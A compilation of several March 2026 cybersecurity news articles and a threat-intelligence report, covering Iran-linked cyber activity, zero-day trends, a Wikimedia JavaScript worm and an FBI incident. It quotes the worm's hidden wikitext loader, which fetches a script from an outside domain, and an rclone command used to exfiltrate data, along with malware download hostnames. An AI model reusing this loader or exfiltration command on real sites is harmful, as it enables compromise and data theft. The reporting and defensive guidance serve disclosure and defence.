It requires a ready and consistent supply of very cheap electricity.

The UAE, as it seeks to diversify away from fossil fuels, has been able to point out that it has this in spades, along with a huge sovereign wealth fund ready to invest and subsidise projects.

According to Turner & Townsend’s Global Data Centre Index, the overall global cost increase of datacentre construction increased in 2025 by 5.5% – but the UAE ranks 44th in the league table of most expensive unit cost per watt out of 52.

The UAE’s geography also makes it a critical subsea cable landing point, providing access between Europe and Asia.

Then there are the geo-politics, with the US keen to keep the Gulf states away from Chinese technology.

A four-day tour by Donald Trump of Saudi Arabia, Qatar, and the UAE last May coincided with the announcement of the construction of a vast new AI campus – a partnership between the UAE and the US – for the purpose of training powerful AI models.

As part of the deal, the Trump administration eased restrictions on advanced chips sales to the Gulf. OpenAI has said the planned UAE campus could eventually serve half the world’s population.

McGuire said that this week’s events could be pivotal. “If we’re going to have large scale datacentres built out in the Middle East, we’re going have to get pretty serious about how we protect them,” he said. ‘We think about how to protect it right now, and we’re saying, ‘Oh, it means you have guards and good cybersecurity’.

“If you’re actually going to double down the Middle East, maybe it means missile defence on datacentres.”

Sean Gorman, the chief executive of Zephr.xyz, a technology firm that is a contractor to the US air force, said that the Gulf states’ ambitions would have likely been in the thoughts of military planners in Tehran.

He said: “I believe the Iranians are building on tactics they’ve seen be effective in the Ukraine conflict. Asymmetric warfare that can target critical infrastructure creates pressure on adversaries by disrupting public safety and economic activity.

“UAE and Bahrain have both been positioning themselves as global AI hubs by investing heavily in datacentres and fibre infrastructure to connect them to the rest of the world.

“If they can disrupt that infrastructure, it puts their strategic position under risk while also disrupting operations that are important to the economy. In addition, there could be an adjacent impact of defence operations, but that would likely be more luck than the primary objective.”

Gorman said the UAE had a “long track record of managing regional instability without becoming party to it” but that there were a range of risks apart from that from the air.

He said: “The UAE also has one of the most diversified submarine-cable landing environments in the Middle East, but the diversity is geographically uneven.

“There are multiple landing stations and cable systems, but many of them concentrate on the east coast at Fujairah, which creates a partial geographic chokepoint.

“In addition, there is a specific risk from Iranian cyber operations targeting US-aligned digital infrastructure in the Gulf, which presents a more concrete near-term threat to datacentre and cloud operations than geography in the traditional sense.”

Gorman said the concern would be if Iran demonstrated any further capability to target Gulf digital infrastructure as part of its retaliation.

He said: “The UAE will need to show partners that its infrastructure is defensible. This is the question investors should be asking, not whether the broader AI ambition survives.”

Vili Lehdonvirta, professor of technology policy at Aalto university and senior fellow at the Oxford Internet Institute, University of Oxford, said there were significant costs to such defences but that the danger was real.

The former chair of the US National Security Commission on AI, Eric Schmidt, suggested last year that a country falling behind in an AI arms race could bomb their adversary’s datacentres.

Lehdonvirta said he suspected that no one actually believed that datacentres “would get bombed despite such scenarios being openly floated for some time”.

“If that’s the case then from now on we might perhaps see operators of prominent datacentres like AWS [Amazon Web Services] investing in air defence, similar to how shipping operators armed up against pirates,” he said.

Where might Iran fruitfully strike next?

“The Iranians will be well aware that the fibreoptic cables that connect these datacentres to the United States and to the rest of the world run through the strait of Hormuz,” Lehdonvirta said, “although they’ll be closely watched by the US and allied forces.”

You've read 23 articles in the last

| Computer Weekly
computerweekly.com
By
Alex Scroxton, Security Editor
Published: 05 Mar 2026 15:00

Exploitation of zero-days by commercial surveillance and spyware developers outpaced exploitation by nation-state actors last year, according to a report.

Suppliers of commercial spyware have edged ahead of nation-state threat actors when it comes to the exploitation of zero-day vulnerabilities at scale, according to data released by the Google Threat Intelligence Group (GTIG).

In a report titled Look what you made us patch: 2025 zero-days in review, the GTIG team said that of 42 unique zero-days it tracked in 2025, it was able to firmly attribute first exploitation of 15 to commercial surveillance vendors (CSVs), compared with 12 that were first exploited by nation-states – seven by China, and nine by financially motivated cyber criminals.

The data additionally highlight three zero-days that were “likely” exploited by China, and one possibly at the intersection of cyber crime and nation-state activity.

The GTIG team, comprising researchers Casey Charrier, James Sadowski, Zander Work, Clement Lecigne, Benoît Stevens and Fred Plan, wrote that despite CSVs increasingly focusing on operational security to obscure their unethical activity, the growth in their activity reflected a trend dating back several years.

“Historically, traditional state-sponsored cyber espionage groups have been the most prolific attributed users of zero-day vulnerabilities,” they said. “[But] over the last few years, the increase of zero-day exploitation attributed to CSVs and their customers has demonstrated the growing ability of these vendors to provide zero-day access to a wider range of threat actors than ever before.

“GTIG has reported extensively on the capabilities CSVs provide their clients, as well as how many CSV customers use zero-day exploits in attacks which erode civil liberties and human rights,” they added.

“In late 2025, we reported on how Intellexa, a prolific procurer and user of zero-days, adapted its operations and tool suite and continues to deliver extremely capable spyware to high paying customers.”

China-nexus threat actors
Beyond CSVs, China-nexus threat actors were the most prolific exploiters of new zero-days, predominantly focusing on edge and networking devices that are hard to monitor, as they seek to gain long-term footholds in their targets’ operations.

GTIG said it was clear that China-nexus espionage actors have become increasingly adept at developing and sharing exploits among themselves, demonstrating their government is prepared to shower them with plentiful technical, and presumably financial, resources – compared with the other “Big Four” states of Iran, North Korea and Russia.

Russian cyber criminals, on the other hand, continue to make a killing and remain able to similarly invest in technical expertise, as evidenced last year by Cl0p’s extortion campaign targeting flaws in Oracle E-Business Suite, and the exploitation of a flaw in the WinRAR file archiver by a group with possible links to the long-standing and ever-present Evil Corp crew.

Overall zero-day volumes remain on par
All this said, more widely, GTIG observed a total of 90 zero-days under active exploitation during 2025, lower than 2023’s record high of 100, but generally in the 60 to 100 range that has become established since the Covid-19 pandemic.

Of these 90 flaws, the raw number and proportion – 43% and 48%, respectively – of these targeted enterprise technology, with zero-days increasingly affecting security and network edge devices, favoured by both cyber criminals and nation-states alike.

CSVs, on the other hand, tended to prefer mobile and browser exploits, the overall volume of which is ebbing and flowing – well up on 2024, but about on par with 2023 – likely thanks to more focused actions from the likes of Google on Android and Apple on iOS, which have forced such threat actors to expand or adjust their techniques, leading to the peaks and troughs.

Broken out by supplier, GTIG found that the clear majority of zero-days understandably target Microsoft, which accounted for 25 in total. This was followed by Google, with 11; Apple, with eight; Cisco and Fortinet, tied on four; and Ivanti and VMware, with three. Six more suppliers had two zero-days each, and the remaining 20 were split across 20 suppliers.

Looking ahead into 2026, GTIG said that as supply-side actors continue their work to make zero-day exploitation tougher for the bad guys – particularly in the mobile space – adversaries will unfortunately continue to hone their skills as well, foreshadowing more expansive techniques and a growing diversity of targets.

The team said that enterprise exploitation in particular will widen thanks to the sheer breadth of applications and devices now in use, with only a single-point-of-failure needed for threat actors to engineer a breach.

The AI factor
The team also expects artificial intelligence (AI) to accelerate the race between attackers and defenders, with AI increasingly used to automate and scale attacks by accelerating recon activity and, critically, exploit discovery and development.

This will put more pressure on defenders to detect and respond to zero-days, but at the same time, they will of course be able to take advantage of AI tools – like agents – in their own work.

GTIG also indicated an emerging paradigm for zero-day exploitation in 2026, heralded by the Brickstorm malware campaign, in which data theft “has the potential to enable long-term zero-day development”.

Rather than merely stealing sensitive client data, Brickstorm’s actors – known as Warp Panda – used it to target their intellectual property, such as source code and development documents, something they could use to work angles on new zero-days in their victims’ software.

politico.com
By Maggie Miller
03/04/2026 07:00 PM EST

But it’s unclear if the strike has fully taken out Iran’s ability to launch cyberattacks as the Middle East war expands.
The Israel Defense Forces on Wednesday said it bombed a compound in Tehran housing Iran’s cyber warfare headquarters — but it’s unclear whether the strike will significantly kneecap Iran’s cyberattack capabilities.

According to a statement from the IDF, its forces on Wednesday carried out a “wide-scale strike” targeting a collection of military sites on the Eastern edge of Tehran that allegedly housed the headquarters of the Iranian Islamic Revolutionary Guards Corps. The IDF claims that the headquarters of the IRGC’s “cyber and electronic headquarters” and its “Intelligence Directorate” were among the military outposts hit in the strike.

It’s unclear to what extent these military sites were damaged or whether there were any casualties. Iran remains under an almost total internet blackout, which began on Feb. 28 when the first U.S. and Israeli strikes began, limiting the flow of information coming out of Iran.

Spokespeople for the IDF and for the Israeli Embassy in Washington did not respond to requests for comment. A spokesperson for the White House declined to comment on whether the U.S. was involved in the strikes and instead deferred to U.S. Central Command, which did not respond to a request for comment.

The IRGC has been linked to major cyber operations against the U.S. in recent years, including a hack and leak attack against the presidential campaign of Donald Trump in 2024.

Iran-linked hackers have been hitting back against the U.S., Israel and surrounding Gulf nations since the U.S.-led military operation on Saturday, which resulted in the assassination of Iranian Supreme Leader Ayatollah Ali Khamenei. According to findings from Israeli cyber firm Check Point Software, two types of surveillance cameras popular across Israel, Qatar, Bahrain and other Middle Eastern nations were compromised by Iranian-linked hackers, likely to monitor missile-related damage to those nations.

Researchers from cybersecurity company Palo Alto Networks’ Unit42 have also tracked dozens of pro-Iran hacktivist groups launching cyberattacks since Feb. 28, largely targeting critical infrastructure. These groups have claimed responsibility for compromises to Israeli payment systems and the temporary shutdown of Kuwaiti government websites.

One of these groups, Handala, has ties to the Iranian Ministry of Intelligence and Security, and claimed responsibility this week for attacks on an Israeli oil and gas energy company and the shutdown of some Jordanian gas stations.

It’s difficult to verify whether this group actually carried out these attacks. Jordan’s cybersecurity agency confirmed earlier this week that it had thwarted an Iranian cyberattack on wheat silo management systems in the country.

Despite the IDF’s strikes against the IRGC’s cyber command centers, cyberattacks linked to outside actors sympathetic to Iran may continue relatively unscathed.

Lt. Gen. Charles Moore, former deputy commander of U.S. Cyber Command, which handles offensive U.S. cyber operations against adversaries, said Wednesday that the IDF strikes will likely have “a significant impact on the regime’s ability to continue to execute these types of operations.” Still, Moore said, “that doesn’t mean proxy forces or others that are ideologically aligned with the regime can’t still attempt to conduct operations against us or Israel.”

The Iranian government has often relied on proxy groups outside the country, including those based in Russia, to carry out cyberattacks or disinformation campaigns on its behalf. This makes it harder to trace efforts back to the Iranian regime and more difficult for impacted countries to respond to these types of decentralized attacks.

“Cyber is now embedded in modern conflict, and operational impact does not require all operators to be physically located in Tehran,” said Alexander Leslie, senior advisor on government affairs at cybersecurity company Recorded Future.

bleepingcomputer.com
March 5, 2026
By Lawrence Abrams

The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began vandalizing pages and modifying user scripts across multiple wikis.
Update: Added Wikimedia Foundation's statement below and made a correction to denote it was only the Meta-Wiki that was vandalized.

The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began modifying user scripts and vandalizing Meta-Wiki pages.

Editors first reported the incident on Wikipedia's Village Pump (technical), where users noticed a large number of automated edits adding hidden scripts and vandalism to random pages.

Wikimedia engineers temporarily restricted editing across projects while they investigated the attack and began reverting changes.

The JavaScript worm
According to Wikimedia's Phabricator issue tracker, it appears the incident started after a malicious script hosted on Russian Wikipedia was executed, causing a global JavaScript script on Wikipedia to be modified with malicious code.

The malicious script was stored at User:Ololoshka562/test.js [Archive], first uploaded in March 2024 and allegedly associated with scripts used in previous attacks on wiki projects.

Based on edit histories reviewed by BleepingComputer, the script is believed to have been executed for the first time by a Wikimedia employee account earlier today while testing user-script functionality. It is not currently known whether the script was executed intentionally, accidentally loaded during testing, or triggered by a compromised account.

BleepingComputer's review of the archived test.js script shows it self-propagates by injecting malicious JavaScript loaders into both a logged-in user's common.js and Wikipedia's global MediaWiki:Common.js, which is used by everyone.

MediaWiki allows both global and user-specific JavaScript files, such as MediaWiki:Common.js and User:<username>/common.js, which are executed in editors’ browsers to customize the wiki interface.

After the initial test.js script was loaded in a logged-in editor's browser, it attempted to modify two scripts using that editor's session and privileges:

User-level persistence: it tried to overwrite User:<username>/common.js with a loader that would automatically load the test.js script whenever that user browses the wiki while logged in.
Site-wide persistence: If the user had the right privileges, it would also edit the global MediaWiki:Common.js script, so that it would run for every editor that uses the global script.

Code to inject a self-propagating JavaScript worm into the MediaWiki:Common.js script
Code to inject a self-propagating JavaScript worm into the MediaWiki:Common.js script
Source: BleepingComputer
If the global script was successfully modified, anyone loading it would automatically execute the loader, which would then repeat the same steps, including infecting their own common.js, as shown below.

A Wikimedia user's infected common.js script
A Wikimedia user's infected common.js script
Source: BleepingComputer
The script also includes functionality to edit a random page by requesting one via the Special:Random wiki command, then editing the page to insert an image and the following hidden JavaScript loader.

[[File:Woodpecker10.jpg|5000px]]
<span style="display:none">
[[#%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E]]
</span>
According to BleepingComputer's analysis, approximately 3,996 pages were modified, and around 85 users had their common.js files replaced during the security incident. It is unknown how many pages were deleted.

Pages modified by JavaScript worm
Pages modified by JavaScript worm
Source: BleepingComputer
As the worm spread, engineers temporarily restricted editing across projects while reverting the malicious changes and removing references to the injected scripts.

During the cleanup, Wikimedia Foundation staff members also rolled back the common.js for numerous users across the platform. These modified pages have now been "supressed" and are no longer visible in the change histories.

At the time of writing, the injected code has been removed, and editing is once again possible.

However, Wikimedia has not yet published a detailed post-incident report explaining exactly how the dormant script was executed or how widely the worm propagated before it was contained.

Update 3/5/26 7:45 PM ET: The Wikimedia Foundation shared the following statement with BleepingComputer, stating that the code was active for only 23 minutes, during which it only changed and deleted content on Meta-Wiki, which has since been restored.

"Earlier today, Wikimedia Foundation staff were conducting a security review of user-authored code on Wikipedia. During that review, we activated dormant code that was then quickly identified to be malicious. As a preventative measure, we temporarily disabled editing on Wikipedia and other Wikimedia projects while we removed the malicious code and confirmed the website was safe for user activity. The security issue behind this disruption has now been resolved.

The code was active for a 23 minute period. During that time, it changed and deleted content on Meta-Wiki – which is now being restored – but it did not cause permanent damage. We have no evidence that Wikipedia was under attack, or that personal information was breached as part of this incident. We are developing additional security measures to minimize the risk of this kind of incident happening again. Updates continue to be made available via the Foundation's public incident log."

cyberscoop.com
Written by Tim Starks

The FBI found evidence that its networks had been targeted in a suspected cybersecurity incident, the bureau confirmed on Thursday, without sharing any further details.

“The FBI identified and addressed suspicious activities on FBI networks, and we have leveraged all technical capabilities to respond,” the agency said in a statement. “We have nothing additional to provide.”

CNN and CBS reported that the suspicious activity targeted a digital system the FBI uses to manage and conduct surveillance, including work related to foreign surveillance warrants, wiretaps and pen registers, which are used to trace phone and computer data like IP addresses and dialed phone numbers.

News broke in 2024 that the Chinese hacking group Salt Typhoon had exploited the U.S. wiretapping system under the Communications Assistance for Law Enforcement Act that law enforcement and intelligence agencies rely upon, but CNN reported that it wasn’t clear if there was a connection between the 2024 and recent suspected incidents.

It also wasn’t clear when the incident occurred, or who was responsible.

The FBI, like virtually every federal agency, is no stranger to being targeted or infiltrated by hackers.

In 2023, the FBI said it had isolated and contained a cyber intrusion in its New York Field Office. In 2021, hackers exploited a misconfigured FBI server to send hoax emails, although the bureau said its own systems weren’t affected.

Congress, former agents and others have raised concerns about the FBI’s cyber capabilities among budget cuts and the loss of personnel under the second Trump administration. Brett Leatherman, leader of the bureau’s cyber division, told CyberScoop recently that it has suffered no diminishment of its ability to respond to threats and incidents.

Tim Starks

| TechCrunch techcrunch.com
Lorenzo Franceschi-Bicchierai
8:11 AM PST · March 2, 2026

A group of hacktivists calling themselves “Department of Peace” claimed to have hacked the Department of Homeland Security (DHS), leaking allegedly stolen documents online.

On Sunday, the nonprofit transparency collective DDoSecrets published data relating to contracts between DHS, Immigration and Customs Enforcement (ICE), and more than 6,000 companies, including defense contractors Anduril, L3Harris, Raytheon, and surveillance enabler Palantir, as well as tech giants Microsoft and Oracle.

The hacktivist said the data comes from the Office of Industry Partnership, a unit within DHS that procures technology from the private sector.

DHS and ICE did not immediately respond to a request for comment.

Department of Peace explained their motives in a document alongside the hack, citing the recent killings of two peaceful protesters, U.S. citizens Alex Pretti and Renée Good, earlier this year in Minneapolis by federal agents.

“Why hack the DHS? I can think of a couple Pretti Good reasons! I’m releasing this because the DHS is killing us and people deserve to know which companies support them and what they’re working on,” the hackers wrote.

Since the beginning of the Trump administration, DHS and federal immigration agents with ICE have undertaken a campaign of mass deportations, arresting people with largely no criminal records, and detaining them in overcrowded facilities where critics say they are held in inhumane conditions. The mass deportation campaign has been aided by several tech companies, with Palantir at the forefront.

Security researcher Micah Lee organized the leaked data on a dedicated website, making the information easily searchable.

The site shows the name of the contractors, the amount of money they were awarded, as well as contact information, such as full names, email addresses, and phone numbers.

The largest contracts by total money awarded included $70 million for Cyber Apex Solutions, a company that claims on its barebones website to be “focused on filling the security gaps of critical infrastructure” in the U.S.; and $59 million for Science Applications International Corporation (SAIC), which provides AI services for government agencies. Underwriters Laboratories was awarded $29 million to provide testing, certification, and market intelligence to customers.

Cyber Apex Solution, SAIC, and Underwriters Laboratories did not immediately respond to a request for comment.

This story was updated to clarify that Palantir enables, not provides, surveillance for the government.

| SECURITY.COM
5 Mar 2026

This activity began in early February and has continued in recent days. What organizations should expect next from Iran-aligned groups and the steps they should take to guard against cyberattacks.

This activity began in early February and has continued in recent days. What organizations should expect next from Iran-aligned groups and the steps they should take to guard against cyberattacks.
Threat Intelligence
5 Mar 2026
23 Min Read
Share
Activity associated with Iranian APT group Seedworm has been spotted on the networks of multiple U.S. companies. The activity began in February 2026 and has continued in recent days.
A U.S. bank, airport, non-profit and the Israeli operations of a U.S. software company were among the targets.
We round up details of recent Iranian cyber threat activity and what defenders need to look out for.

The Iranian APT group Seedworm (aka MuddyWater, Temp Zagros, Static Kitten) has been active on the networks of multiple U.S. companies since the beginning of February 2026, with activity continuing in recent days following U.S. and Israeli military strikes on Iran that have sparked conflict in the region.

A U.S. bank, software company and airport, and non-governmental organizations in both the U.S. and Canada, have experienced suspicious activity on their networks in recent days and weeks. The software company is a supplier to the defense and aerospace industries among others, and has a presence in Israel, with the company’s Israel operation seeming to be the target in this activity.

A previously unknown backdoor, which we have named Dindoor, was found on the networks of the Israeli outpost of this software company, with the same backdoor seen on the networks of a U.S. bank and the Canadian non-profit organization. This backdoor leverages Deno, the secure runtime for JavaScript and TypeScript, to execute. This backdoor was signed with a certificate issued to “Amy Cherne”.

There was also an attempt to exfiltrate data from the software company using Rclone to a Wasabi cloud storage bucket. It’s not clear if this was successful.

rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[REMOVED]:/192.168.0.x

A different, Python backdoor called Fakeset was found on the networks of the U.S. airport and non-profit. It was signed by certificates issued to “Amy Cherne” and “Donald Gay”. The Donald Gay certificate has been used previously to sign malware linked to Seedworm. The backdoor was downloaded from two servers belonging to the Backblaze cloud storage company:

gitempire.s3.us-east-005.backblazeb2.com

elvenforest.s3.us-east-005.backblazeb2.com

The Donald Gay certificate was also used to sign a sample from the malware family we call Stagecomp and which downloads the Darkcomp backdoor. The Stagecomp and the Darkcomp malware have been linked to Seedworm by vendors including Google, Microsoft and Kaspersky. While this malware wasn’t seen on the targeted networks, the use of the same certificates suggests the same actor - namely Seedworm - was behind the activity on the networks of the U.S. companies.

While it’s not known if the operations of Seedworm are disrupted by the current conflict, already having a presence on U.S. and Israeli networks prior to the current hostilities beginning means the threat group is in a potentially dangerous position to launch attacks. While we have disrupted these breaches, other organizations could still be vulnerable to attack.

Seedworm is a long-standing Iranian threat group, which usually mounts classic espionage attacks for the purposes of spying and information gathering. Active since 2017, CISA has said that Seedworm is “a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).” Seedworm originally focused on victims in the Middle East but later broadened its scope to target telecommunications, defense, local government, and oil and natural gas organizations in Asia, Africa, Europe, and North America. The group develops its own custom malware as well as using dual-use and living off the land tools.

Context
On February 28, 2026, the U.S. and Israel launched a coordinated offensive military air operation targeting Iran, leading to the death of Iran’s Supreme Leader Ayatollah Ali Khamenei, who was apparently killed on March 1 when a U.S./Israeli airstrike hit his compound. Several other high-ranking Iranian officials, as well as multiple civilians, were also killed in strikes.

In retaliation, Iran launched drones and ballistic missiles at adversaries throughout the Gulf region, including targeting Israel and U.S. military and diplomatic outposts in multiple countries in the region.

Because of the heated tension in the region and ongoing attacks, it is likely Iran and its allies may also initiate cyber operations to further target their adversaries. Both Israel and Iran have a history of carrying out destructive cyberattacks, including against each other. While internet access in Iran may be disrupted by current military operations, there are cyber operatives working for the regime based in other countries.

The UK’s National Cyber Security Centre released an alert following this recent activity, stating that “Iranian state and Iran-linked cyber actors almost certainly currently maintain at least some capability to conduct cyber activity” and warning about the potential threat posed by “Iran-linked hacktivists”. Check Point also reported recently that the Handala threat group (see below) has been using the Starlink satellite network to stay online even before this most recent activity began, with the group reportedly leveraging the technology since mid-January, when a nationwide Internet shutdown was announced by Iran’s government.

Examining the cyber activity typically carried out by threat actors associated with Iran and its allies may help us predict the kinds of cyber operations we may see being executed as this conflict continues.

Iranian threat actors have become increasingly proficient in recent years. Not only has their tooling and malware improved, but they’ve also demonstrated strong social engineering capabilities, including spear-phishing campaigns and “honeytrap” operations used to build relationships with targets of interest to gain access to accounts or sensitive information.

One of the hallmarks of Iran’s operations in cyberspace is that it periodically mounts destructive attacks against organizations in countries it deems hostile, which at the moment would obviously include the U.S. and Israel. That creates a risk for organizations in those countries because these attacks are about sending a message rather than stealing information, which means that any organization in the country targeted could be in the firing line.

Other recent activity
Doxing Israeli officials and regional energy sector participants
Handala is an Iranian-aligned hacktivist group that is also known to operate in support of Palestine. They have been active since at least 2024. They are known for conducting attacks targeting Israeli organizations and entities perceived to support Israel by conducting phishing attacks, data theft, ransomware, extortion and destructive attacks, including the use of custom wipers. The group operates a leaks site where victim names are posted alongside stolen data and messages from the group. The group was also reportedly active on multiple underground cybercrime forums including BreachForums, Ramp and Exploit during its early days, but has since become more active on Telegram channels and X (formerly Twitter).

In December 2025, the group claimed to have compromised the mobile devices of former Israeli Prime Minister Naftali Bennett and Benjamin Netanyahu's Chief of Staff, Tzachi Braverman. The group leaked material they said they had stolen from the phones, including the contact information of prominent Israeli officials, journalists and business people, photos and videos. However, analysis by researchers disputed some of these claims, saying that the attacks appeared to be limited to Telegram accounts, and did not achieve complete phone access.

In February 2026, Handala claimed to have breached one of Israel's largest healthcare networks. Meanwhile, in March 2026, the group said it had breached Sharjah National Oil Corporation and Israel Opportunity Energy, exfiltrating more than 1.3TB of sensitive data, including confidential financial data, oil contracts and project details. The group has also made claims about breaching Saudi Arabian energy company Saudi Aramco in a post on its leaks site. However, the documents shared appeared to consist of older files that were already in circulation previously. This raises the possibility that the claim may have been exaggerated or partially fabricated, potentially representing an influence or psychological operation intended to generate attention, panic or reputation damage. The group has also posted messages claiming that Israeli Prime Minister Benjamin Netanyahu will be their next target.

Spearphishing academics and NGOs for intelligence collection
In an October 2025 campaign, Seedworm carried out a sophisticated spear-phishing attack that used a compromised mailbox to distribute a custom backdoor known as Phoenix to international organizations across the Middle East and North Africa (MENA), targeting more than 100 government entities as part of an espionage campaign.

The attackers leveraged a malicious Office attachment that has technical overlap with previously reported Seedworm attacks to deliver Phoenix. The command & control (C&C) server also reportedly hosted the PDQ remote access tool, which was used for remote access and persistence, as well as a custom browser credential stealer. It is believed the motive behind these attacks was intelligence collection, as well as persistent access, for the purposes of longer-term espionage and exfiltration.

Elsewhere, in November 2025, Seedworm was also linked to attacks that targeted academics with expertise on the Middle East and other foreign policy experts. This activity took place between June and August 2025. Suspicious spear-phishing emails impersonated Suzanne Maloney – the vice president and director of the Foreign Policy program at the Brookings Institution and an expert on Iran – using a Gmail address and a misspelled version of her name - “Suzzane Maloney.”. In the attacks, the actors started out using a benign email, which eventually led to a subsequent email that contained a malicious link to a remote access tool payload. It is likely these attacks were carried out as a means to perform espionage - more specifically, as a means to gather intelligence that could be leveraged for strategic advantage.

These attacks had TTP overlaps with other Iranian aligned groups (Smoke Sandstorm, Mint Sandstorm/Charming Kitten) but were subsequently attributed to Seedworm.

Other 2025 activity
Camera scanning for intelligence gathering
Marshtreader (Pink Sandstorm, Agrius, Agonizing Serpens) is a group that has been active since 2020 and is reportedly linked to Iran’s Ministry of Intelligence and Security (MOIS). It is known for its destructive operations against countries in the Middle East, specifically Israel, conducting attacks under multiple aliases and leveraging data leaks in order to control and shape narratives using wiper and fake ransomware malware.

In June 2025, it was reported that the group was observed scanning for vulnerable cameras using CVE-2023-6895 and CVE-2017-7921 across Israel during the June 2025 conflict using infrastructure associated with Iranian actors.

In previous conflicts, actors have been observed compromising cameras to gather intelligence to support bombing damage assessment (BDA) by providing near-real time visibility of impact from bombings and strikes. It is likely these attacks were conducted to gain similar visibility into sensitive locations to perform reconnaissance and potentially enable follow-on targeting of high value targets.

Additionally, in June 2025, a successful password-spraying attack conducted from Nord VPN infrastructure against Israeli municipal government entities was reported followed by spear-phishing attacks that contained links to a ClickFix page designed to trick users into executing malicious PowerShell to ultimately deliver a remote access tool (RAT) that can execute arbitrary commands by the attackers. It is likely the motive behind these attacks was account compromise and espionage. It is not clear what actor was behind these attacks, but the targeting of Israeli targets points to an Iranian actor as the most likely perpetrator.

DieNet DDoS attacks
DieNet is a pro-Palestinian hacktivist group that emerged on Telegram around March 2025 and announced its intention to target “outlaw sites and corrupt government platforms” using DDoS attacks.

Following the arrest of activist Mahmoud Khalil, its activities intensified, with the group claiming responsibility for multiple DDoS attacks against U.S. critical infrastructure, including energy, financial, healthcare, government, transit and communication systems.

In its attacks, the group leveraged high-volume DDoS attacks reportedly via DDoS-as-a-service infrastructure, including TCP RST, DNS amplification, TCP SYN floods and NTP amplification attacks, as well as website defacements and data breaches.

Based on reporting, its motives were likely political retaliation and service disruption.

What can we expect next?
Given Iran's history of attacks leveraging destructive wipers, distributed-denial-of-service (DDoS) and hack-and-leak attacks, the likely next steps for the nation’s cyber actors and supporters may be multiple campaigns combining high-visibility disruption for political signaling and lower-visibility access operations for strategic leverage.

Defenders should anticipate noisy activity such as DDoS attacks, defacements, and leak claims targeting government, transportation, energy and defense contractors to amplify psychological and economic pressure.

It is also likely that more capable state-aligned groups will continue credential harvesting operations, along with vulnerability exploitation and covert persistence against critical infrastructure to generate immediate impact, while also positioning themselves for potential future destructive, espionage or coercive operations.

DDoS and defacements
Given the increase in "hacktivist" activity, we predict a surge in DDoS and defacements for fast signaling and media impact, similar to what has been observed recently with Handala’s claims of targeting critical national infrastructure (CNI).

It is likely such attacks would target a range of sectors, including government portals, municipal sites, airports/ports, logistics providers, banks, telcos, media and symbolic brands.

Password spraying and mailbox compromises
Over the last year, multiple reports involving Iran-backed groups repeatedly highlighted credential attacks and mailbox compromises as a means of initial access and intelligence gathering.

Targets could include defense organizations, government, contractors and NGOs. Additionally, adjacent organizations that support base operations, including fuel, catering, logistics, and communications could also be targets of these attacks.

Leaks / intimidation operations / psyops
Hacktivists such as Handala repeatedly use leaks and claims to amplify fear and pressure even when access is only partial - this is key escalation behavior.

Potential targets of these kinds of attacks and claims would likely include healthcare, local government, airports/ports, transportation and education, as well as high-profile individuals tied to defense, politics and media.

Critical infrastructure and opportunistic attacks
Given the current escalations between the U.S. and Iran, it is likely that CNI is at high risk of attack, as well as organizations supporting these entities.

Organizations with exposed terminal operating systems, schedules and trucking/rail interfaces may be targeted, as well as passenger processing systems, baggage systems, and contractor networks. Additionally, given the high risk, other organizations that operate within sectors such as energy/fuel supply chains may be targets.

Destructive attacks
Iran has previously exhibited high capabilities in destructive potential, particularly during escalation windows.

Any attacks would likely to be focused on energy and utilities, transportation and logistics, financial sector, telecoms, healthcare, defense contractors and military suppliers.

How can defenders prepare?
Organizations should prepare by focusing on strengthening monitoring capabilities and ensure resilience across their infrastructure where possible. Early indicators such as vulnerability scanning, credential attacks and reconnaissance activity often provide an opportunity for defenders to detect intrusion attempts early in the attack chain.

DDoS and defacement campaigns
Due to the likelihood of early retaliation and intensifying psyops, defenders should expect attempts to disrupt public-facing services and monitor any internet-facing infrastructure for the following:

Spikes in HTTP requests from large, distributed IP ranges
Repeated probing of admin portals
Exploit attempts targeting web frameworks and content management systems
Scanning activity against exposed API endpoints
To prepare, organizations should look at performing the following:

Deploy web application firewalls (WAF) with updated rule sets
Enable DDoS protection via CDN or upstream filtering services
Decommission any non-essential or unused publicly accessible services
Ensure all up-to-date patches for web applications/plugins are applied regularly
Ensure website backups exist for rapid restoration, if required
Monitor underground forums, Telegram channels and social media for claims involving your organization
Credential attacks
Credential attacks are one of the most common initial access techniques used by Iranian-linked groups, which include attack attempts against multiple public-facing services.

Defenders should ensure monitoring is in place to identify patterns consistent with password-spraying attempts, such as the following:

Repeated login failure attempts across multiple users
Authentication attempts from unusual geographic locations
MFA fatigue attacks
Login attempts occurring outside of normal working hours
Vulnerability scanning and exploitation of vulnerable VPN appliances or edge infrastructure
Deployment of web shells on internet-facing servers
Credential harvesting through phishing campaigns
Organizations should review and harden any identity security mechanisms by performing the following:

Enable multi-factor authentication for all remote access
Disable legacy authentication protocols
Implement condition access policies based on location and device risk
Restrict admin logins to specific locations, where possible
Monitor identity provider logs for any anomalies
Leak campaigns and intimidation operations
Hacktivist groups often use hack-and-leak campaigns designed to gain media attention and apply psychological pressure, usually via partial data leaks and exaggerated breach claims. Security teams should watch for indicators of data staging or exfiltration, such as the following:

Unusual downloads from email systems
Unusual access to document repositories
Suspicious archive creation (e.g. ZIP, RAR) on internal systems, usually involving collection of multiple file types
Large outbound data transfers to external cloud storage platforms
Unexpected use of data-transfer applications (e.g. Rclone) in their environment
Organizations should focus on ensuring monitoring is in place for the following:

Large outbound data transfers
Implement data loss prevention (DLP) policies
Restrict access to external cloud storage platforms
Enable auditing of email and file access
Having a communications plan for potential leak claims can also help organizations respond quickly to these threats.

Attacks on critical infrastructure
Critical infrastructure organizations and companies that support military logistics may face attacks that attempt to compromise the following:

Operational Technology (OT) interfaces
Scheduled and logistics systems
Contractor networks
Remote management systems
Security teams should ensure adequate monitoring is in place for:

Abnormal access to ICS
Unexpected remote connections to operational networks
Authentication attempts targeting infrastructure management systems
Unusual configuration changes in critical systems
Vendor access and contractor networks
Organizations faced with these attacks, at a minimum, should ensure:

Network segmentation across operational technology networks
Restrict remote access to infrastructure systems
Monitor contractor VPN access
Maintain offline backups of critical configuration systems
Destructive attacks
Iran has repeatedly demonstrated its destructive capabilities in the past, with attacks such as Shamoon, which targeted Saudi Arabia's oil industry to wipe thousands of systems.

Organizations that anticipate such attacks should ensure they monitor for indicators that attackers may be preparing for a destructive operation such as:

Mass scheduled task creation
Attempts to disable security applications
Deletion of shadow copies or backup data
Unusual administrative commands executed across multiple hosts
